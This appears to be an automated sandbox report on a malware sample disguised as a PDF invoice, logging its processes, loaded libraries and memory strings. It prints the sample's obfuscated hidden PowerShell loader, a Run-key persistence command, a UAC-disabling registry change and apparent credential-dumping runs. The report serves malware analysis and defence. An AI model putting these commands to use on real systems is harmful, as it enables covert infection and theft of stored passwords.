            Source: Nubilum.exe, Nubilum.exe, 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
            Source: Nubilum.exe, Nubilum.exe, 0000001D.00000002.1689288450.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
            Source: Nubilum.exe, 00000010.00000002.3695789252.000000001F110000.00000040.10000000.00040000.00000000.sdmp, Nubilum.exe, 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
            Source: Nubilum.exe, Nubilum.exe, 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
            Source: Nubilum.exe, Nubilum.exe, 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
            Source: Nubilum.exe, Nubilum.exe, 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
            Source: Nubilum.exe, 0000001C.00000003.1711574673.0000000000AE9000.00000004.00000020.00020000.00000000.sdmp, Nubilum.exe, 0000001C.00000002.1713385295.0000000000AE9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Nubilum.exe, Nubilum.exe, 0000001C.00000002.1712019298.0000000000400000.00000040.80000000.00040000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
            Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exeVirustotal: Detection: 14%
            Source: Vyuctovani_2024_07-1206812497#U00b7pdf.exeReversingLabs: Detection: 29%
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeFile read: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeEvasive API call chain: __getmainargs,DecisionNodes,exitgraph_29-33210
            Source: unknownProcess created: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe "C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exe"
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28';$Thiohydrate=$Repowered144.SubString(6682,3);.$Thiohydrate($Repowered144)"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Nubilum.exe "C:\Users\user~1\AppData\Local\Temp\Nubilum.exe"
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)"
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)"
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
            Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess created: C:\Users\user\AppData\Local\Temp\Nubilum.exe C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\avtrjqntogc"
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess created: C:\Users\user\AppData\Local\Temp\Nubilum.exe C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\cpykjjxvcoutma"
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess created: C:\Users\user\AppData\Local\Temp\Nubilum.exe C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\nrdukbioqxmyohrux"
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle hidden "$Repowered144=Get-Content 'C:\Users\user\AppData\Local\twinsomeness\Telefonsvarer\Svenskheds.Gre28';$Thiohydrate=$Repowered144.SubString(6682,3);.$Thiohydrate($Repowered144)"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Nubilum.exe "C:\Users\user~1\AppData\Local\Temp\Nubilum.exe"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess created: C:\Windows\SysWOW64\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess created: C:\Users\user\AppData\Local\Temp\Nubilum.exe C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\avtrjqntogc"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess created: C:\Users\user\AppData\Local\Temp\Nubilum.exe C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\cpykjjxvcoutma"Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeProcess created: C:\Users\user\AppData\Local\Temp\Nubilum.exe C:\Users\user~1\AppData\Local\Temp\Nubilum.exe /stext "C:\Users\user\AppData\Local\Temp\nrdukbioqxmyohrux"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "husmndenes" /t REG_EXPAND_SZ /d "%tomboyism% -windowstyle minimized $Eftertaklede=(Get-ItemProperty -Path 'HKCU:\Bukkespringenes\').Hovedstads;%tomboyism% ($Eftertaklede)"Jump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /fJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: dwmapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: oleacc.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Users\user\Desktop\Vyuctovani_2024_07-1206812497#U00b7pdf.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: rstrtmgr.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: vaultcli.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\Nubilum.exeSection loaded: windows.storage.dllJump to behavior
